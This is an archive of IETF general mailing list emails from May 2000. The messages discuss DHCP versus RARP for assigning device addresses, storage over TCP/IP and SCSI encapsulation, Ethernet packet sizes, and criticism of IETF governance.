Message-Id: <[EMAIL PROTECTED]>
From: Ravichandran M <[EMAIL PROTECTED]>
Reply-To: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
To: "'Sriram Shanmugam'" <[EMAIL PROTECTED]>,
"'[EMAIL PROTECTED]'"
<[EMAIL PROTECTED]>
Subject: RE: Configuration...
Date: Thu, 25 May 2000 15:40:31 +0530
Organization: Future Software
X-Mailer: Microsoft Internet E-mail/MAPI - 8.0.0.4211
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Hi,
If its only IP address, use RARP mechanism to get the IP address (this
requires a rarp server to be in place in the same network). RARP server can
be enabled in the Linux server. If RARP fails(after some timeout), then go
ahead to use Bootp to get the IP address.
Regards
M.Ravichandran
-----Original Message-----
From: Sriram Shanmugam [SMTP:[EMAIL PROTECTED]]
Sent: Thursday, May 25, 2000 3:05 PM
To: '[EMAIL PROTECTED]'
Subject: Configuration...
Hai ,
I am developing a configuration software which should assign an IP
address for a network device which is connected to the network for the
first time through my program .
What is the procedure ? , should i use bootp or DHCP or ARP , please
do advice me .In case I assign only IP address in my configuration
application , can i write a common configuration software which can be used
to configure for HP , Lexmark , sharp etc etc.
Thanks in advance,
Regards,
S.Sriram
>From owner-ietf-outbound Thu May 25 07:20:09 2000
Received: by ietf.org (8.9.1a/8.9.1a) id HAA03805
for [EMAIL PROTECTED]; Thu, 25 May 2000 07:20:02 -0400 (EDT)
Received: from scriba.org ([EMAIL PROTECTED] [208.178.122.40])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id HAA03690
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 07:15:48 -0400 (EDT)
Received: from localhost (bob@localhost) by scriba.org (8.8.5/8.7.3) with ESMTP id
HAA13905; Thu, 25 May 2000 07:14:50 -0400
Date: Thu, 25 May 2000 07:14:50 -0400 (EDT)
From: Bob Allisat <[EMAIL PROTECTED]>
X-Sender: bob@mansfield
To: [EMAIL PROTECTED]
cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: RE: IETF *is* computer crime.
Message-ID: <Pine.LNX.4.21.0005241743020.24030-100000@mansfield>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
Mark Paton writes:
> The IETF does a great job and does'nt deserve or
> warrent this attack. The people who deserve it
> are the politicians who are trying to implement
> "laws" on the use of the InterNet, have a go at
> them and leave this group alone.
Hate to belabour a point that is probably
hopeless but .... those politicians include
the blessed leaders of the blessed IETF. Who,
through ICANN, ISOC, IAB, support of the ITU
& the WTO and so on advocate a "law" of their
own. With no oversight or real popular democratic
checks, balances or controls. That only seems
to increase centralization, inhibit innovation
and enhance the power and influence *not* of
citizens but of corporate power-holders and
executives. Which they just happen to be.
For example the horrendous manner in which
competition and participation by individuals
and small businesses in the creation of New
Domain Names was suffocated. Anyone remember
what happened to Alternic? And that was thanks
to core IETF insiders and friends. Another
example is the manner in which IP addresses
are being artificially restricted and marketed.
I mean there is no shortage of numbers is there?
The last example is the increasingly complex
and rarified atmosphere in which standards and
protocols are being mortified. By the same
people who stand the most to gain fom any
development: industry insiders. All in the
interests of a very few fellow citizens.
But all that doesn't matter, does it. As long
as the network works no-one (meaning anyone
making money hand over fist from all this)
complains. The hugely inflated paper profits
keep rolling in for all those stock option
holders who make up the IETF, ICANN, IAB and
so on and so forth. Problem? Not for these
folks. For the rest of us, maybe. Not for the
bloody IETF, oh no.
Bob Allisat
>From owner-ietf-outbound Thu May 25 10:21:09 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA08981
for [EMAIL PROTECTED]; Thu, 25 May 2000 10:20:02 -0400 (EDT)
Received: from poseidon.bwc.state.oh.us ([198.234.212.100])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA08941
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 10:17:30 -0400 (EDT)
Received: by poseidon.bwc.state.oh.us; id KAA19508; Thu, 25 May 2000 10:15:30 -0400
(EDT)
Received: from venus.bwc.state.oh.us(165.223.131.35) by neptune.bwc.state.oh.us via
smap (V5.0)
id xma019463; Thu, 25 May 00 10:14:36 -0400
Received: from mswg6.bwc.state.oh.us ([165.223.130.24])
by venus.bwc.state.oh.us (8.9.3/8.9.1) with ESMTP id KAA08389
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 10:21:16 -0400 (EDT)
Received: by MSWG6 with Internet Mail Service (5.5.2650.21)
id <L1K9BVA7>; Thu, 25 May 2000 10:15:49 -0400
Message-ID: <6FDE0867413DD21182BF00A0C972519204C98A15@MSWG4>
From: "Morrisey Matthew J." <[EMAIL PROTECTED]>
To: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: 48th IETF meeting in Pittsburgh, PA
Date: Thu, 25 May 2000 10:15:41 -0400
X-Mailer: Internet Mail Service (5.5.2650.21)
X-Loop: [EMAIL PROTECTED]
Who is the host?
Where can i find more info?
Matt Morrisey
>From owner-ietf-outbound Thu May 25 10:30:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA09244
for [EMAIL PROTECTED]; Thu, 25 May 2000 10:30:02 -0400 (EDT)
Received: from inner.net (avarice.inner.net [199.33.248.2])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA08957
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 10:19:24 -0400 (EDT)
Received: from wasp.inet.org ([216.52.8.30])
by inner.net (8.7.6/8.9.3) with ESMTP id OAA03032;
Thu, 25 May 2000 14:11:28 GMT
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58
Date: Thu, 25 May 2000 10:19:04 +0100
To: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
From: RJ Atkinson <[EMAIL PROTECTED]>
Subject: RE: Configuration...
Cc: <[EMAIL PROTECTED]>
In-Reply-To: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
At 11:10 25-05-00 , Ravichandran M wrote:
>Hi,
>If its only IP address, use RARP mechanism to get the IP address (this
>requires a rarp server to be in place in the same network). RARP server can
>be enabled in the Linux server. If RARP fails(after some timeout), then go
>ahead to use Bootp to get the IP address.
With all respect, RARP is a disaster operationally. DHCP would be
a much better choice from the viewpoint of most (not all) network
operations folks in the world.
Ran
>From owner-ietf-outbound Thu May 25 11:30:25 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA11295
for [EMAIL PROTECTED]; Thu, 25 May 2000 11:30:02 -0400 (EDT)
Received: from mail.cic.tsinghua.edu.cn (mail.cic.tsinghua.edu.cn [166.111.4.11])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA11149
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 11:21:59 -0400 (EDT)
Received: from a ([166.111.178.110])
by mail.cic.tsinghua.edu.cn (8.8.7/8.8.7) with SMTP id AAA18165
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 00:26:47 +0900 (CDT)
Message-Id: <[EMAIL PROTECTED]>
Date: Thu, 25 May 2000 23:25:48 +0800
From: qtl <[EMAIL PROTECTED]>
To: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
Subject: digital wrapper!
X-mailer: FoxMail 3.0 beta 2 [cn]
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Hi:
How about digital wrapper now?I want to know it?
Where can I find the document about it?
Thank you!
qtl
[EMAIL PROTECTED]
>From owner-ietf-outbound Thu May 25 13:30:15 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA14951
for [EMAIL PROTECTED]; Thu, 25 May 2000 13:30:02 -0400 (EDT)
Received: from ljcqs016.cnf.com (egate1.cnf.com [205.185.108.239])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA14897
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 13:29:05 -0400 (EDT)
Received: from mwabs030.emeryworld.com (localhost [127.0.0.1])
by ljcqs016.cnf.com (8.9.3/8.9.3) with ESMTP id KAA19044
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 10:28:17 -0700 (PDT)
Received: by mwabs030.emeryworld.com with Internet Mail Service (5.5.2650.21)
id <L2AK3FS9>; Thu, 25 May 2000 15:29:12 -0000
Message-ID: <[EMAIL PROTECTED]>
From: "Dawson, Peter D" <[EMAIL PROTECTED]>
To: "'IETF general mailing list'" <[EMAIL PROTECTED]>
Subject: RE: Privacy (RE: Should IETF do more to fight computer crime?)
Date: Thu, 25 May 2000 15:36:09 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
>-----Original Message-----
>From: Harald Alvestrand [mailto:[EMAIL PROTECTED]]
>Sent: Wednesday, May 24, 2000 9:45 AM
>To: Dawson, Peter D; 'IETF general mailing list'
>Subject: RE: Privacy (RE: Should IETF do more to fight computer crime?)
>
>
>At 12:40 24.05.2000 +0000, Dawson, Peter D wrote:
>>So the "unverified accusation" ... should become "verifiable" and this
>>could only be possible if there is a code of ethics between
>noc/isp etc...
>>i.e just what I suggested in my earlier posting...
>RFC 2350 and draft-ietf-grip-isp-expectations, and other GRIP
>documents are
>the furthest the IETF has come in addressing the "code of
>ethics" problem.
>
Is there a GRIP online email archive ??
/pd
>From owner-ietf-outbound Thu May 25 14:00:11 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA16316
for [EMAIL PROTECTED]; Thu, 25 May 2000 14:00:02 -0400 (EDT)
Received: from rip.psg.com (rip.psg.com [147.28.0.39])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA16199
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 13:55:00 -0400 (EDT)
Received: from randy by rip.psg.com with local (Exim 3.13 #1)
id 12v1qR-0008k8-00; Thu, 25 May 2000 10:54:55 -0700
From: Randy Bush <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
To: "Dawson, Peter D" <[EMAIL PROTECTED]>
Cc: "'IETF general mailing list'" <[EMAIL PROTECTED]>
Subject: RE: Privacy (RE: Should IETF do more to fight computer crime?)
References: <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
Date: Thu, 25 May 2000 10:54:55 -0700
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
> Is there a GRIP online email archive ??
details about all ietf wgs are on the ietf web site, <http://ietf.org/>.
grip's in particular is <http://www.ietf.org/html.charters/grip-charter.html>.
randy
>From owner-ietf-outbound Thu May 25 14:10:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA16621
for [EMAIL PROTECTED]; Thu, 25 May 2000 14:10:02 -0400 (EDT)
Received: from ljcqs016.cnf.com (egate1.cnf.com [205.185.108.239])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA16491
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 14:05:20 -0400 (EDT)
Received: from mwabs030.emeryworld.com (localhost [127.0.0.1])
by ljcqs016.cnf.com (8.9.3/8.9.3) with ESMTP id LAA05866
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 11:04:50 -0700 (PDT)
Received: by mwabs030.emeryworld.com with Internet Mail Service (5.5.2650.21)
id <L2AK3JB6>; Thu, 25 May 2000 17:51:51 -0000
Message-ID: <[EMAIL PROTECTED]>
From: "Dawson, Peter D" <[EMAIL PROTECTED]>
To: "'IETF general mailing list'" <[EMAIL PROTECTED]>
Subject: RE: Privacy (RE: Should IETF do more to fight computer crime?)
Date: Thu, 25 May 2000 17:58:46 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
>-----Original Message-----
>From: Randy Bush [mailto:[EMAIL PROTECTED]]
>Sent: Thursday, May 25, 2000 1:55 PM
>To: Dawson, Peter D
>Cc: 'IETF general mailing list'
>Subject: RE: Privacy (RE: Should IETF do more to fight computer crime?)
>
>
>> Is there a GRIP online email archive ??
>
>details about all ietf wgs are on the ietf web site,
><http://ietf.org/>.
>grip's in particular is
><http://www.ietf.org/html.charters/grip-charter.html>.
>
>randy
>
Thanks, however, I was looking for a online archive..rather then the
flat file,< archive: http://www-ext.eng.uu.net/grip-wg/grip-wg.txt >
/pd
>From owner-ietf-outbound Thu May 25 17:20:27 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA20932
for [EMAIL PROTECTED]; Thu, 25 May 2000 17:20:02 -0400 (EDT)
Received: from ns2.microwavenetworks.com (ns2.microwavenetworks.com [209.44.144.2])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA20869
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 17:17:34 -0400 (EDT)
Received: from mercury.mns (exchmail [172.16.11.6])
by ns2.microwavenetworks.com (8.9.3/8.9.3) with ESMTP id QAA23880
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 16:17:31 -0500
Received: by MERCURY with Internet Mail Service (5.0.1460.8)
id <CDGQ9GZT>; Thu, 25 May 2000 16:15:14 -0500
Message-ID: <CC96542306D7D2119E0B080009EB58FE9582FA@MERCURY>
From: Timothy Behne <[EMAIL PROTECTED]>
To: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: Average Ethernet packet length
Date: Thu, 25 May 2000 16:15:12 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.0.1460.8)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
> Hi,
>
> A recent thread suggested something interesting - an average Ethernet/IP
> packet length of 500 bytes. Has there been any work done in the area of
> finding average packet lengths, bandwidth usage, etc. of typical (read:
> unknown) networks? Are there any "rules of thumb" values that are
> typically used?
>
> Thanks,
>
> Tim Behne
> Signal Processing Engineer
> Tadiran Microwave Networks
> 1000 Greenbriar, Ste 100A
> Stafford, Texas 77477
> [EMAIL PROTECTED]
>
>From owner-ietf-outbound Thu May 25 17:40:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA21349
for [EMAIL PROTECTED]; Thu, 25 May 2000 17:40:02 -0400 (EDT)
Received: from shell9.ba.best.com ([EMAIL PROTECTED] [206.184.139.140])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA21305
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 17:36:44 -0400 (EDT)
Received: (from bovik@localhost)
by shell9.ba.best.com (8.9.3/8.9.2/best.sh) id OAA27465;
Thu, 25 May 2000 14:36:33 -0700 (PDT)
Date: Thu, 25 May 2000 14:36:33 -0700 (PDT)
From: "James P. Salsman" <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Wimba uses ports 4382 and 5644
X-Loop: [EMAIL PROTECTED]
The asynchronous audio conferencing applet at www.wimba.com
uses TCP ports 4382 and 5644.
Sites wishing to explore Wimba will need to allow access for
TCP transmissions on those ports. Those concerned regarding
security issues should note that the signed applet has been
ranked in the top 1% (and #1 overall, actually) by the JARS
Java Applet Rating Service.
I've sent Wimba.com the URL for the commonly known port number
registration form, as those ports do not yet appear in:
http://www.isi.edu/in-notes/iana/assignments/port-numbers
Anyone knowing of any other uses of those ports, please
mailto:[EMAIL PROTECTED]. Thanks!
Cheers,
James
>From owner-ietf-outbound Thu May 25 17:50:11 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA21536
for [EMAIL PROTECTED]; Thu, 25 May 2000 17:50:02 -0400 (EDT)
Received: from mailhost.IntNet.net (mailhost.IntNet.net [198.252.32.150])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA21489
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 17:46:15 -0400 (EDT)
Received: from jtoigo by mailhost.IntNet.net (8.8.5/INTNET/SMI-SVR4)
id RAA06691; Thu, 25 May 2000 17:49:16 -0400 (EDT)
X-Auth: cs-clw-5-99.intnet.net [207.90.1.99]
Message-ID: <06d001bfc693$7f18ff20$dd9cfea9@jtoigo>
From: "Jon William Toigo" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Subject: Storage over Ethernet/IP
Date: Thu, 25 May 2000 17:52:14 -0400
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_06CD_01BFC671.F56982C0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2615.200
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200
X-Loop: [EMAIL PROTECTED]
This is a multi-part message in MIME format.
------=_NextPart_000_06CD_01BFC671.F56982C0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
I am seeking a few points of clarification:
1. Fibre Channel folks have attempted to explain to me why TCP/IP could =
NEVER be a viable interconnect for block level storage operations. They =
claim:
a. TCP is too CPU intensive and creates too much latency for storage =
I/O operations.
b. The IP stack is too top heavy and processing packet headers is too =
slow to support storage I/O operations.
c. The maximum throughput of a GE TCP/IP connection is 768 Mps, which =
is too slow to support storage I/O operations.
Is any of this true?
2. Adaptec has posited a replacement for TCP called STP for use as a =
transport for storage. Does anyone know anything about this?
3. Current discussions of the SCSI over IP protocol seem to ignore the =
issue of TCP or any other transport protocol. Does anyone know =
definitively what transport is being suggested by the IBM/Cisco crowd?
4. Another storage company is looking at Reliable UDP as a substitute =
for TCP in storage data transfers. Where can I learn more about this =
protocol, which I am told was introduced many years ago by Cisco?
Thanks in advance for your assistance.
Jon William Toigo
Independent Consultant and Author
[EMAIL PROTECTED]
------=_NextPart_000_06CD_01BFC671.F56982C0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2614.3500" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>I am seeking a few points of=20
clarification:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>1. Fibre Channel folks have =
attempted to=20
explain to me why TCP/IP could NEVER be a viable interconnect for block =
level=20
storage operations. They claim:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>a. TCP is too CPU intensive and =
creates too=20
much latency for storage I/O operations.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>b. The IP stack is too top heavy =
and=20
processing packet headers is too slow to support storage I/O=20
operations.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>c. The maximum throughput of a GE =
TCP/IP=20
connection is 768 Mps, which is too slow to support storage I/O=20
operations.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Is any of this true?</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>2. Adaptec has posited a =
replacement for TCP=20
called STP for use as a transport for storage. Does anyone know =
anything=20
about this?</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>3. Current discussions =
of the SCSI over=20
IP protocol seem to ignore the issue of TCP or any other transport=20
protocol. Does anyone know definitively what transport is being =
suggested=20
by the IBM/Cisco crowd?</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>4. Another storage company is =
looking at=20
Reliable UDP as a substitute for TCP in storage data transfers. =
Where can=20
I learn more about this protocol, which I am told was introduced many =
years ago=20
by Cisco?</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Thanks in advance for your =
assistance.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Jon William Toigo</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Independent Consultant and =
Author</FONT></DIV>
<DIV><FONT face=3DArial size=3D2><A=20
href=3D"mailto:[EMAIL PROTECTED]">[EMAIL PROTECTED]</A></FONT></DIV>
<DIV> </DIV>
<DIV> </DIV></BODY></HTML>
------=_NextPart_000_06CD_01BFC671.F56982C0--
>From owner-ietf-outbound Thu May 25 19:00:27 2000
Received: by ietf.org (8.9.1a/8.9.1a) id TAA22228
for [EMAIL PROTECTED]; Thu, 25 May 2000 19:00:02 -0400 (EDT)
Received: from mailhost3.lanl.gov (mailhost3.lanl.gov [128.165.3.9])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id SAA22175
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 18:55:49 -0400 (EDT)
Received: from pescado.lanl.gov (bus-mail.lanl.gov [128.165.3.80])
by mailhost3.lanl.gov (8.9.3/8.9.3/(cic-5, 2/8/99)) with ESMTP id QAA27932;
Thu, 25 May 2000 16:55:50 -0600
Received: by pescado.lanl.gov (Postfix, from userid 7337)
id B0A6B2167E; Thu, 25 May 2000 16:55:49 -0600 (MDT)
Received: from localhost (localhost [127.0.0.1])
by pescado.lanl.gov (Postfix) with ESMTP
id ABB5C23DF9; Thu, 25 May 2000 16:55:49 -0600 (MDT)
Date: Thu, 25 May 2000 22:55:49 +0000 (GMT)
From: Mike Fisk <[EMAIL PROTECTED]>
To: Jon William Toigo <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Subject: Re: Storage over Ethernet/IP
In-Reply-To: <06d001bfc693$7f18ff20$dd9cfea9@jtoigo>
Message-ID: <[EMAIL PROTECTED]>
X-Pager-URL: http://home.lanl.gov/mfisk/snpp/
X-Homepage: http://home.lanl.gov/mfisk/
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
On Thu, 25 May 2000, Jon William Toigo wrote:
> I am seeking a few points of clarification:
>
> 1. Fibre Channel folks have attempted to explain to me why TCP/IP
> could NEVER be a viable interconnect for block level storage
> operations. They claim:
>
> a. TCP is too CPU intensive and creates too much latency for storage
> I/O operations.
>
> b. The IP stack is too top heavy and processing packet headers is too
> slow to support storage I/O operations.
>
> c. The maximum throughput of a GE TCP/IP connection is 768 Mps, which
> is too slow to support storage I/O operations.
This is not a theoretical limitation, but is in the ballpark reported by
many general-purpose operating systems with commodity hardware.
>Is any of this true?
I don't believe that TCP/IP implementations couldn't be optimized to
support full link rate and low latency. If you're building a hardware
adapter that can do SCSI and RAID fast, adding TCP shouldn't be
prohibitively hard.
> 2. Adaptec has posited a replacement for TCP called STP for use as a
> transport for storage. Does anyone know anything about this?
STP is the Scheduled Transfer protocol being standardized by the ANSI T11
folks. ST was designed to run on top of GSN (a.k.a. HIPPI-6400). In my
opinion, it is as heavy-weight as TCP with respect to most of the things
stated above. It does have the potential advantage of being designed from
scratch to support zero-copy access to user space using specialized
interface cards.
> 3. Current discussions of the SCSI over IP protocol seem to ignore
> the issue of TCP or any other transport protocol. Does anyone know
> definitively what transport is being suggested by the IBM/Cisco crowd?
I believe the assumption is that you will have a local network with no
packet loss or significant bit error rate. Basically, you assume that
your ethernet is as reliable as your SCSI cable or fiber-channel network.
For a well engineered, fully-switched LAN, that may be a reasonable
assumption.
-- Mike Fisk, RADIANT Team, Network Engineering Group, Los Alamos National
Lab See http://home.lanl.gov/mfisk/ for contact information
>From owner-ietf-outbound Thu May 25 19:30:10 2000
Received: by ietf.org (8.9.1a/8.9.1a) id TAA22680
for [EMAIL PROTECTED]; Thu, 25 May 2000 19:30:04 -0400 (EDT)
Received: from ece.cmu.edu (ECE.CMU.EDU [128.2.236.200])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id TAA22558
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 19:27:02 -0400 (EDT)
Received: from yogi.ece.cmu.edu (IDENT:[EMAIL PROTECTED] [128.2.252.128])
by ece.cmu.edu (8.9.2/8.8.8) with ESMTP id TAA24324;
Thu, 25 May 2000 19:27:04 -0400 (EDT)
Received: from yogi.ece.cmu.edu (bassoon@localhost [127.0.0.1])
by yogi.ece.cmu.edu (8.8.7/8.8.7) with ESMTP id TAA18567;
Thu, 25 May 2000 19:27:03 -0400
Message-Id: <[EMAIL PROTECTED]>
To: "Jon William Toigo" <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: Storage over Ethernet/IP
In-reply-to: Your message of "Thu, 25 May 2000 17:52:14 EDT."
<06d001bfc693$7f18ff20$dd9cfea9@jtoigo>
Date: Thu, 25 May 2000 19:27:02 -0400
From: Dave Nagle <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
Jon,
Original Message
----------------
>> I am seeking a few points of clarification:
>>
>> 1. Fibre Channel folks have attempted to explain to me why TCP/IP could =
>> NEVER be a viable interconnect for block level storage operations. They =
>> claim:
>> a. TCP is too CPU intensive and creates too much latency for storage =
>> I/O operations.
>> b. The IP stack is too top heavy and processing packet headers is too =
>> slow to support storage I/O operations.
There is a lot of work to show that this is not true. Check out Van
Meter's 1998 ASPLOS paper "VISA - Netstations virtual internet SCSI
adaptor."
Perhaps more importantly, there are many companies that are building
TCP in silicon ASICs. This should make TCP's performance comparable
to Fibre Channel. Both TCP/IP and FC provide about the same
functionality ... reliable, in-order transmission.
The bottom line is that FC is done in hardware while TCP has
traditionally been done in software. Therefore, previous performance
numbers are not going to be fair. Once TCP is in silicon, its
performance should be roughly equal to FC.
>> c. The maximum throughput of a GE TCP/IP connection is 768 Mps, which =
>> is too slow to support storage I/O operations.
I believe there are higher numbers (especially with Jumbo
Frames). Alteon's web site show's 920 Mbps. Microsoft and Duke
University have both shown TCP performance o 1Gb+/s performance over
other networks.
BTW, why is 768 Mbps too slow for storage. Many apps (e.g.,
transaction workloads) are I/O's per second bound, not bandwidth
bound. Also, even if storage over IP/ether is a bit slower than FC,
the benefits of leveraging IP's infrastructure (i.e., routers,
switches, NICs, network management, networking people) is a huge
advantage.
There is also the issue of SCSI over TCP/IP in the SAN vs. the
LAN/WAN. Some companies, focusing on the SAN, are building
SCSI/lightweight transport/IP while others, focusing on the WAN,
propose SCSI/TCP/IP. It may be the case that SAN and WAN traffic use
different transport protocols to gain a bit of extra performance in
the SAN.
>> Is any of this true?
>>
>> 2. Adaptec has posited a replacement for TCP called STP for use as a =
>> transport for storage. Does anyone know anything about this?
From Paul von Stamwitz's posting to the ips mailing list ...
The link to the SEP draft is
http://www.ietf.org/internet-drafts/draft-wilson-sep-00.txt
The press release is at:
http://www.adaptec.com/adaptec/press/release000504.html
The demo shows a Gb ethernet controller transporting SCSI traffic to several
targets through an off-the-shelf 100TX switch with a Gb uplink. The targets
are ethernet to U160 SCSI bridges with one or more SCSI drives attached. The
host controller runs under NT4.0 at appears to the OS as a SCSI host bus
adapter.
The architecture is based on Adaptec's SCSI Encapsulation Protocol
(SEP). SEP is mapped on top of TCP/IP or a light-weight transport
protocol specifically designed for SANs.
An SEP overview was presented at the IPS BOF in Adelaide last month and an
internet draft on SEP was submitted to IETF this week. I will forward the
link as soon as it becomes available. This draft is informational
only and intended to aid in this group's work toward an industry
standard SCSI transport protocol over IP networks.
>> 3. Current discussions of the SCSI over IP protocol seem to ignore the =
>> issue of TCP or any other transport protocol. Does anyone know =
>> definitively what transport is being suggested by the IBM/Cisco crowd?
Current SCSI over IP discussions are not ignoring TCP ... they are
definitely considering TCP as the primary transport. See the ips
web site at:
http://www.ece.cmu.edu/~ips
>>
>> 4. Another storage company is looking at Reliable UDP as a substitute =
>> for TCP in storage data transfers. Where can I learn more about this =
>> protocol, which I am told was introduced many years ago by Cisco?
Companies to look at include:
nishansystems.com
interprophet.com
san.com
arkresearch.com
Also, I believe that the IETF IP over FC working group is now
looking at FC over IP.
dave...........
David Nagle
Director, Parallel Data Lab
Senior Reseach Computer Scientist
School of Computer Science
Carnegie Mellon University
Pittsburgh, PA 15213
412-268-3898 (office)
412-268-3890 (fax)
http://www.ece.cmu.edu/~bassoon
>From owner-ietf-outbound Thu May 25 20:10:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id UAA23247
for [EMAIL PROTECTED]; Thu, 25 May 2000 20:10:02 -0400 (EDT)
Received: from mailhost.IntNet.net (mailhost.IntNet.net [198.252.32.150])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id UAA23205
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 20:02:42 -0400 (EDT)
Received: from jtoigo by mailhost.IntNet.net (8.8.5/INTNET/SMI-SVR4)
id UAA21506; Thu, 25 May 2000 20:05:52 -0400 (EDT)
X-Auth: cs-clw-5-99.intnet.net [207.90.1.99]
Message-ID: <071301bfc6a6$932353e0$dd9cfea9@jtoigo>
From: "Jon William Toigo" <[EMAIL PROTECTED]>
To: "Dave Nagle" <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Subject: Re: Storage over Ethernet/IP
Date: Thu, 25 May 2000 20:08:50 -0400
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2615.200
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
